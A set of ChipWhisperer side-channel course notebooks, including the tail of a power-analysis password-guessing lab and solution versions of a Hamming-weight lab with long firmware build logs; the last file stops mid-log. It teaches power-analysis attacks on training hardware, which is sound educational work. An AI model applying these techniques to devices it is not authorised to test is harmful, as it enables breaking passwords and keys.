705 | 706 | 707 | You should get an output that looks like this: 708 | 709 | :: 710 | 711 | h 712 | h0 713 | h0p 714 | h0px 715 | h0px3 716 | 717 | If so - 🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳🥳 Congrats - you did it!!!! 718 | 719 | If not - check some troubleshooting hints below. If you get really 720 | stuck, check the ``SOLN`` version (there is one for both with hardware 721 | and simulated). 722 | 723 | Troubleshooting - Always get ‘h’ 724 | -------------------------------- 725 | 726 | Some common problems you might run into - first, if you get an output 727 | which keeps guessing the first character: 728 | 729 | :: 730 | 731 | h 732 | hh 733 | hhh 734 | hhhh 735 | hhhhh 736 | 737 | Check that when you run the ``cap_pass_trace`` inside the loop (checking 738 | the guessed password), are you updating the prefix of the password? For 739 | example, the old version of the code (guessing a single character) 740 | looked like this: 741 | 742 | :: 743 | 744 | trace = cap_pass_trace(c + "\n") 745 | 746 | But that is always sending our first character only! So we need to send 747 | the “known good password so far”. In the example code something like 748 | this: 749 | 750 | :: 751 | 752 | trace = cap_pass_trace(guessed_pw + c + "\n") 753 | 754 | Where ``guessed_pw`` progressively grows with the known good start of 755 | the password. 756 | 757 | Troubleshooting - Always get ‘a’ 758 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 759 | 760 | This looks like it’s always matching the first character: 761 | 762 | :: 763 | 764 | h 765 | ha 766 | haa 767 | haaa 768 | haaaa 769 | 770 | Check that you update the ``ref_trace`` - if you re-use the original 771 | reference trace, you won’t be looking at a reference where the first N 772 | characters are good, and the remaining characters are bad. An easy way 773 | to do this is again using the ``guessed_pw`` variable and appending a 774 | null + newline: 775 | 776 | :: 777 | 778 | trace = cap_pass_trace(guessed_pw + "\x00\n") 779 | 780 | -------------- 781 | 782 | NO-FUN DISCLAIMER: This material is Copyright (C) NewAE Technology Inc., 783 | 2015-2020. ChipWhisperer is a trademark of NewAE Technology Inc., 784 | claimed in all jurisdictions, and registered in at least the United 785 | States of America, European Union, and Peoples Republic of China. 786 | 787 | Tutorials derived from our open-source work must be released under the 788 | associated open-source license, and notice of the source must be 789 | *clearly displayed*. Only original copyright holders may license or 790 | authorize other distribution - while NewAE Technology Inc. holds the 791 | copyright for many tutorials, the github repository includes community 792 | contributions which we cannot license under special terms and **must** 793 | be maintained as an open-source release. Please contact us for special 794 | permissions (where possible). 795 | 796 | THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS 797 | OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 798 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 799 | IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 800 | CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, 801 | TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE 802 | SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 803 | 804 | 805 | **In [13]:** 806 | 807 | .. code:: ipython3 808 | 809 | assert guessed_pw == 'h0px3', "Failed to break password" 810 | -------------------------------------------------------------------------------- /courses_sca101_SOLN_Lab 3_1 - Large Hamming Weight Swings-CWNANO-CWNANO.rst: -------------------------------------------------------------------------------- 1 | Part 3, Topic 1: Large Hamming Weight Swings (MAIN) 2 | =================================================== 3 | 4 | 5 | 6 | **SUMMARY:** *In the previous part of the course, you saw that a 7 | microcontroller’s power consumption changes based on what it’s doing. In 8 | the case of a simple password check, this allowed us to see how many 9 | characters of the password we had correct, eventually resulting in the 10 | password being broken.* 11 | 12 | *That attack was based on different code execution paths showing up 13 | differently in power traces. In this next set of labs, we’ll posit that, 14 | not only does different instructions affect power consumption, the data 15 | being manipulated in the microcontroller also affects power 16 | consumption.* 17 | 18 | **LEARNING OUTCOMES:** 19 | 20 | - Using a power measurement to ‘validate’ a possible device model. 21 | - Detecting the value of a single bit using power measurement. 22 | - Breaking AES using the classic DPA attack. 23 | 24 | Prerequisites 25 | ------------- 26 | 27 | Hold up! Before you continue, check you’ve done the following tutorials: 28 | 29 | - ☑ Jupyter Notebook Intro (you should be OK with plotting & running 30 | blocks). 31 | - ☑ SCA101 Intro (you should have an idea of how to get 32 | hardware-specific versions running). 33 | - ☑ SCA101 Part 2 (you should understand how power consupmtion changes 34 | based on what code is being run) 35 | 36 | Power Trace Gathering 37 | --------------------- 38 | 39 | At this point you’ve got to insert code to perform the power trace 40 | capture. There are two options here: \* Capture from physical device. \* 41 | Read from a file. 42 | 43 | You get to choose your adventure - see the two notebooks with the same 44 | name of this, but called ``(SIMULATED)`` or ``(HARDWARE)`` to continue. 45 | Inside those notebooks you should get some code to copy into the 46 | following section, which will define the capture function. 47 | 48 | Be sure you get the ``"✔️ OK to continue!"`` print once you run the next 49 | cell, otherwise things will fail later on! 50 | 51 | 52 | **In [1]:** 53 | 54 | .. code:: ipython3 55 | 56 | SCOPETYPE = 'CWNANO' 57 | PLATFORM = 'CWNANO' 58 | CRYPTO_TARGET = 'TINYAES128C' 59 | VERSION = 'HARDWARE' 60 | 61 | 62 | **In [2]:** 63 | 64 | .. code:: ipython3 65 | 66 | if VERSION == 'HARDWARE': 67 | %run "Lab 3_1 - Large Hamming Weight Swings (HARDWARE).ipynb" 68 | elif VERSION == 'SIMULATED': 69 | %run "Lab 3_1 - Large Hamming Weight Swings (SIMULATED).ipynb" 70 | 71 | 72 | **Out [2]:** 73 | 74 | 75 | 76 | .. parsed-literal:: 77 | 78 | Building for platform CWNANO with CRYPTO\_TARGET=TINYAES128C 79 | SS\_VER set to SS\_VER\_1\_1 80 | Blank crypto options, building for AES128 81 | rm -f -- simpleserial-aes-CWNANO.hex 82 | rm -f -- simpleserial-aes-CWNANO.eep 83 | rm -f -- simpleserial-aes-CWNANO.cof 84 | rm -f -- simpleserial-aes-CWNANO.elf 85 | rm -f -- simpleserial-aes-CWNANO.map 86 | rm -f -- simpleserial-aes-CWNANO.sym 87 | rm -f -- simpleserial-aes-CWNANO.lss 88 | rm -f -- objdir/\*.o 89 | rm -f -- objdir/\*.lst 90 | rm -f -- simpleserial-aes.s simpleserial.s stm32f0\_hal\_nano.s stm32f0\_hal\_lowlevel.s aes.s aes-independant.s 91 | rm -f -- simpleserial-aes.d simpleserial.d stm32f0\_hal\_nano.d stm32f0\_hal\_lowlevel.d aes.d aes-independant.d 92 | rm -f -- simpleserial-aes.i simpleserial.i stm32f0\_hal\_nano.i stm32f0\_hal\_lowlevel.i aes.i aes-independant.i 93 | . 94 | Welcome to another exciting ChipWhisperer target build!! 95 | arm-none-eabi-gcc.exe (GNU Arm Embedded Toolchain 9-2020-q2-update) 9.3.1 20200408 (release) 96 | Copyright (C) 2019 Free Software Foundation, Inc. 97 | This is free software; see the source for copying conditions. There is NO 98 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 99 | 100 | . 101 | Compiling C: simpleserial-aes.c 102 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -DNO\_EXTRA\_OPTS -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DTINYAES128C -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-aes.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/simpleserial-aes.o.d simpleserial-aes.c -o objdir/simpleserial-aes.o 103 | . 104 | Compiling C: .././simpleserial/simpleserial.c 105 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -DNO\_EXTRA\_OPTS -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DTINYAES128C -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 106 | . 107 | Compiling C: .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c 108 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -DNO\_EXTRA\_OPTS -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DTINYAES128C -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_nano.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_nano.o.d .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c -o objdir/stm32f0\_hal\_nano.o 109 | . 110 | Compiling C: .././hal/stm32f0/stm32f0\_hal\_lowlevel.c 111 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -DNO\_EXTRA\_OPTS -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DTINYAES128C -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_lowlevel.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_lowlevel.o.d .././hal/stm32f0/stm32f0\_hal\_lowlevel.c -o objdir/stm32f0\_hal\_lowlevel.o 112 | . 113 | Compiling C: .././crypto/tiny-AES128-C/aes.c 114 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -DNO\_EXTRA\_OPTS -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DTINYAES128C -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/aes.o.d .././crypto/tiny-AES128-C/aes.c -o objdir/aes.o 115 | . 116 | Compiling C: .././crypto/aes-independant.c 117 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -DNO\_EXTRA\_OPTS -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DTINYAES128C -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/aes-independant.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/aes-independant.o.d .././crypto/aes-independant.c -o objdir/aes-independant.o 118 | . 119 | Assembling: .././hal/stm32f0/stm32f0\_startup.S 120 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -ffunction-sections -DF\_CPU=7372800 -Wa,-gstabs,-adhlns=objdir/stm32f0\_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C .././hal/stm32f0/stm32f0\_startup.S -o objdir/stm32f0\_startup.o 121 | . 122 | Linking: simpleserial-aes-CWNANO.elf 123 | arm-none-eabi-gcc -mcpu=cortex-m0 -I. -DNO\_EXTRA\_OPTS -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_1 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DTINYAES128C -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-aes.o -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/simpleserial-aes-CWNANO.elf.d objdir/simpleserial-aes.o objdir/simpleserial.o objdir/stm32f0\_hal\_nano.o objdir/stm32f0\_hal\_lowlevel.o objdir/aes.o objdir/aes-independant.o objdir/stm32f0\_startup.o --output simpleserial-aes-CWNANO.elf --specs=nano.specs --specs=nosys.specs -T .././hal/stm32f0\_nano/LinkerScript.ld -Wl,--gc-sections -lm -mthumb -mcpu=cortex-m0 -Wl,-Map=simpleserial-aes-CWNANO.map,--cref -lm 124 | . 125 | Creating load file for Flash: simpleserial-aes-CWNANO.hex 126 | arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature simpleserial-aes-CWNANO.elf simpleserial-aes-CWNANO.hex 127 | . 128 | Creating load file for EEPROM: simpleserial-aes-CWNANO.eep 129 | arm-none-eabi-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 130 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex simpleserial-aes-CWNANO.elf simpleserial-aes-CWNANO.eep \|\| exit 0 131 | . 132 | Creating Extended Listing: simpleserial-aes-CWNANO.lss 133 | arm-none-eabi-objdump -h -S -z simpleserial-aes-CWNANO.elf > simpleserial-aes-CWNANO.lss 134 | . 135 | Creating Symbol Table: simpleserial-aes-CWNANO.sym 136 | arm-none-eabi-nm -n simpleserial-aes-CWNANO.elf > simpleserial-aes-CWNANO.sym 137 | Size after: 138 | text data bss dec hex filename 139 | 5056 536 1480 7072 1ba0 simpleserial-aes-CWNANO.elf 140 | +-------------------------------------------------------- 141 | + Default target does full rebuild each time. 142 | + Specify buildtarget == allquick == to avoid full rebuild 143 | +-------------------------------------------------------- 144 | +-------------------------------------------------------- 145 | + Built for platform CWNANO Built-in Target (STM32F030) with: 146 | + CRYPTO\_TARGET = TINYAES128C 147 | + CRYPTO\_OPTIONS = AES128C 148 | +-------------------------------------------------------- 149 | Serial baud rate = 38400 150 | INFO: Found ChipWhisperer😍 151 | Serial baud rate = 115200 152 | Detected known STMF32: STM32F03xx4/03xx6 153 | Extended erase (0x44), this can take ten seconds or more 154 | Attempting to program 5591 bytes at 0x8000000 155 | STM32F Programming flash... 156 | STM32F Reading flash... 157 | Verified flash OK, 5591 bytes 158 | Serial baud rate = 38400 159 | 160 | 161 | 162 | 163 | 164 | .. parsed-literal:: 165 | 166 | Lab 3\_1 - Large Hamming Weight Swings (HARDWARE).ipynb:14: TqdmDeprecationWarning: Please use \`tqdm.notebook.trange\` instead of \`tqdm.tnrange\` 167 | "---\n", 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | .. parsed-literal:: 176 | 177 | WARNING:root:NO TRACE DATA RECEIVED 178 | WARNING:root:NO TRACE DATA RECEIVED 179 | WARNING:root:NO TRACE DATA RECEIVED 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | **In [3]:** 188 | 189 | .. code:: ipython3 190 | 191 | print(len(trace_array)) 192 | 193 | 194 | **Out [3]:** 195 | 196 | 197 | 198 | .. parsed-literal:: 199 | 200 | 100 201 | 202 | 203 | 204 | 205 | **In [4]:** 206 | 207 | .. code:: ipython3 208 | 209 | assert len(trace_array) == 100 210 | print("✔️ OK to continue!") 211 | 212 | 213 | **Out [4]:** 214 | 215 | 216 | 217 | .. parsed-literal:: 218 | 219 | ✔️ OK to continue! 220 | 221 | 222 | 223 | Grouping Traces 224 | --------------- 225 | 226 | As we’ve seen in the slides, we’ve made an assumption that setting bits 227 | on the data lines consumes a measurable amount of power. Now, we’re 228 | going test that theory by getting our target to manipulate data with a 229 | very high Hamming weight (0xFF) and a very low Hamming weight (0x00). 230 | For this purpose, the target is currently running AES, and it encrypted 231 | the text we sent it. If we’re correct in our assumption, we should see a 232 | measurable difference between power traces with a high Hamming weight 233 | and a low one. 234 | 235 | Currently, these traces are all mixed up. Separate them into two groups: 236 | ``one_list`` and ``zero_list``: 237 | 238 | 239 | **In [5]:** 240 | 241 | .. code:: ipython3 242 | 243 | # ################### 244 | # Add your code here 245 | # ################### 246 | #raise NotImplementedError("Add Your Code Here") 247 | 248 | # ################### 249 | # START SOLUTION 250 | # ################### 251 | one_list = [] 252 | zero_list = [] 253 | 254 | for i in range(len(trace_array)): 255 | if textin_array[i][0] == 0x00: 256 | one_list.append(trace_array[i]) 257 | else: 258 | zero_list.append(trace_array[i]) 259 | # ################### 260 | # END SOLUTION 261 | # ################### 262 | 263 | assert len(one_list) > len(zero_list)/2 264 | assert len(zero_list) > len(one_list)/2 265 | 266 | We should have two different lists. Whether we sent 0xFF or 0x00 was 267 | random, so these lists likely won’t be evenly dispersed. Next, we’ll 268 | want to take an average of each group (make sure you take an average of 269 | each trace at each point! We don’t want an average of the traces in 270 | time), which will help smooth out any outliers and also fix our issue of 271 | having a different number of traces for each group: 272 | 273 | 274 | **In [6]:** 275 | 276 | .. code:: ipython3 277 | 278 | # ################### 279 | # Add your code here 280 | # ################### 281 | #raise NotImplementedError("Add Your Code Here") 282 | 283 | # ################### 284 | # START SOLUTION 285 | # ################### 286 | one_avg = np.mean(one_list, axis=0) 287 | zero_avg = np.mean(zero_list, axis=0) 288 | # ################### 289 | # END SOLUTION 290 | # ################### 291 | 292 | Finally, subtract the two averages and plot the resulting data: 293 | 294 | 295 | **In [7]:** 296 | 297 | .. code:: ipython3 298 | 299 | # ################### 300 | # Add your code here 301 | # ################### 302 | #raise NotImplementedError("Add Your Code Here") 303 | 304 | # ################### 305 | # START SOLUTION 306 | # ################### 307 | %matplotlib inline 308 | import matplotlib.pyplot as plt 309 | 310 | diff = one_avg - zero_avg 311 | 312 | plt.plot(diff) 313 | plt.show() 314 | # ################### 315 | # END SOLUTION 316 | # ################### 317 | 318 | 319 | **Out [7]:** 320 | 321 | 322 | .. image:: img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_14_0.png 323 | 324 | 325 | You should see a very distinct trace near the beginning of the plot, 326 | meaning that the data being manipulated in the target device is visible 327 | in its power trace! Again, there’s a lot of room to explore here: 328 | 329 | - Try setting multiple bytes to 0x00 and 0xFF. 330 | - Try using smaller hamming weight differences. Is the spike still 331 | distinct? What about if you capture more traces? 332 | - We focused on the first byte here. Try putting the difference plots 333 | for multiple different bytes on the same plot. 334 | - The target is running AES here. Can you get the spikes to appear in 335 | different places if you set a byte in a later round of AES (say round 336 | 5) to 0x00 or 0xFF? 337 | 338 | -------------- 339 | 340 | NO-FUN DISCLAIMER: This material is Copyright (C) NewAE Technology Inc., 341 | 2015-2020. ChipWhisperer is a trademark of NewAE Technology Inc., 342 | claimed in all jurisdictions, and registered in at least the United 343 | States of America, European Union, and Peoples Republic of China. 344 | 345 | Tutorials derived from our open-source work must be released under the 346 | associated open-source license, and notice of the source must be 347 | *clearly displayed*. Only original copyright holders may license or 348 | authorize other distribution - while NewAE Technology Inc. holds the 349 | copyright for many tutorials, the github repository includes community 350 | contributions which we cannot license under special terms and **must** 351 | be maintained as an open-source release. Please contact us for special 352 | permissions (where possible). 353 | 354 | THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS 355 | OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 356 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 357 | IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 358 | CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, 359 | TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE 360 | SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 361 | -------------------------------------------------------------------------------- /courses_sca101_SOLN_Lab 3_1 - Large Hamming Weight Swings-OPENADC-CWLITEARM.rst: -------------------------------------------------------------------------------- 1 | Part 3, Topic 1: Large Hamming Weight Swings (MAIN) 2 | =================================================== 3 | 4 | 5 | 6 | **SUMMARY:** *In the previous part of the course, you saw that a 7 | microcontroller’s power consumption changes based on what it’s doing. In 8 | the case of a simple password check, this allowed us to see how many 9 | characters of the password we had correct, eventually resulting in the 10 | password being broken.* 11 | 12 | *That attack was based on different code execution paths showing up 13 | differently in power traces. In this next set of labs, we’ll posit that, 14 | not only does different instructions affect power consumption, the data 15 | being manipulated in the microcontroller also affects power 16 | consumption.* 17 | 18 | **LEARNING OUTCOMES:** 19 | 20 | - Using a power measurement to ‘validate’ a possible device model. 21 | - Detecting the value of a single bit using power measurement. 22 | - Breaking AES using the classic DPA attack. 23 | 24 | Prerequisites 25 | ------------- 26 | 27 | Hold up! Before you continue, check you’ve done the following tutorials: 28 | 29 | - ☑ Jupyter Notebook Intro (you should be OK with plotting & running 30 | blocks). 31 | - ☑ SCA101 Intro (you should have an idea of how to get 32 | hardware-specific versions running). 33 | - ☑ SCA101 Part 2 (you should understand how power consupmtion changes 34 | based on what code is being run) 35 | 36 | Power Trace Gathering 37 | --------------------- 38 | 39 | At this point you’ve got to insert code to perform the power trace 40 | capture. There are two options here: \* Capture from physical device. \* 41 | Read from a file. 42 | 43 | You get to choose your adventure - see the two notebooks with the same 44 | name of this, but called ``(SIMULATED)`` or ``(HARDWARE)`` to continue. 45 | Inside those notebooks you should get some code to copy into the 46 | following section, which will define the capture function. 47 | 48 | Be sure you get the ``"✔️ OK to continue!"`` print once you run the next 49 | cell, otherwise things will fail later on! 50 | 51 | 52 | **In [1]:** 53 | 54 | .. code:: ipython3 55 | 56 | SCOPETYPE = 'OPENADC' 57 | PLATFORM = 'CWLITEARM' 58 | CRYPTO_TARGET = 'TINYAES128C' 59 | VERSION = 'HARDWARE' 60 | 61 | 62 | **In [2]:** 63 | 64 | .. code:: ipython3 65 | 66 | if VERSION == 'HARDWARE': 67 | %run "Lab 3_1 - Large Hamming Weight Swings (HARDWARE).ipynb" 68 | elif VERSION == 'SIMULATED': 69 | %run "Lab 3_1 - Large Hamming Weight Swings (SIMULATED).ipynb" 70 | 71 | 72 | **Out [2]:** 73 | 74 | 75 | 76 | .. parsed-literal:: 77 | 78 | Building for platform CWLITEARM with CRYPTO_TARGET=TINYAES128C 79 | SS_VER set to SS_VER_1_1 80 | Blank crypto options, building for AES128 81 | rm -f -- simpleserial-aes-CWLITEARM.hex 82 | rm -f -- simpleserial-aes-CWLITEARM.eep 83 | rm -f -- simpleserial-aes-CWLITEARM.cof 84 | rm -f -- simpleserial-aes-CWLITEARM.elf 85 | rm -f -- simpleserial-aes-CWLITEARM.map 86 | rm -f -- simpleserial-aes-CWLITEARM.sym 87 | rm -f -- simpleserial-aes-CWLITEARM.lss 88 | rm -f -- objdir/\*.o 89 | rm -f -- objdir/\*.lst 90 | rm -f -- simpleserial-aes.s simpleserial.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s aes.s aes-independant.s 91 | rm -f -- simpleserial-aes.d simpleserial.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d aes.d aes-independant.d 92 | rm -f -- simpleserial-aes.i simpleserial.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i aes.i aes-independant.i 93 | . 94 | Welcome to another exciting ChipWhisperer target build!! 95 | arm-none-eabi-gcc.exe (GNU Arm Embedded Toolchain 9-2020-q2-update) 9.3.1 20200408 (release) 96 | Copyright (C) 2019 Free Software Foundation, Inc. 97 | This is free software; see the source for copying conditions. There is NO 98 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 99 | 100 | . 101 | Compiling C: simpleserial-aes.c 102 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial-aes.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/simpleserial-aes.o.d simpleserial-aes.c -o objdir/simpleserial-aes.o 103 | . 104 | Compiling C: .././simpleserial/simpleserial.c 105 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 106 | . 107 | Compiling C: .././hal/stm32f3/stm32f3_hal.c 108 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f3_hal.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ -I.././crypto/tiny-AES128-C -std=gnu99 -MMD -MP -MF .dep/stm32f3_hal.o.d .././hal/stm32f3/stm32f3_hal.c -o objdir/stm32f3_hal.o 109 | . 110 | Compiling C: .././hal/stm32f3/stm32f3_hal_lowlevel.c 111 | arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -DNO_EXTRA_OPTS -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -gdwarf-2 -DSS_VER=SS_VER_1_1 -DSTM32F303xC -DSTM32F3 -DSTM32 -DDEBUG -DHAL_TYPE=HAL_stm32f3 -DPLATFORM=CWLITEARM -DTINYAES128C -DF_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f3_hal_lowlevel.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core 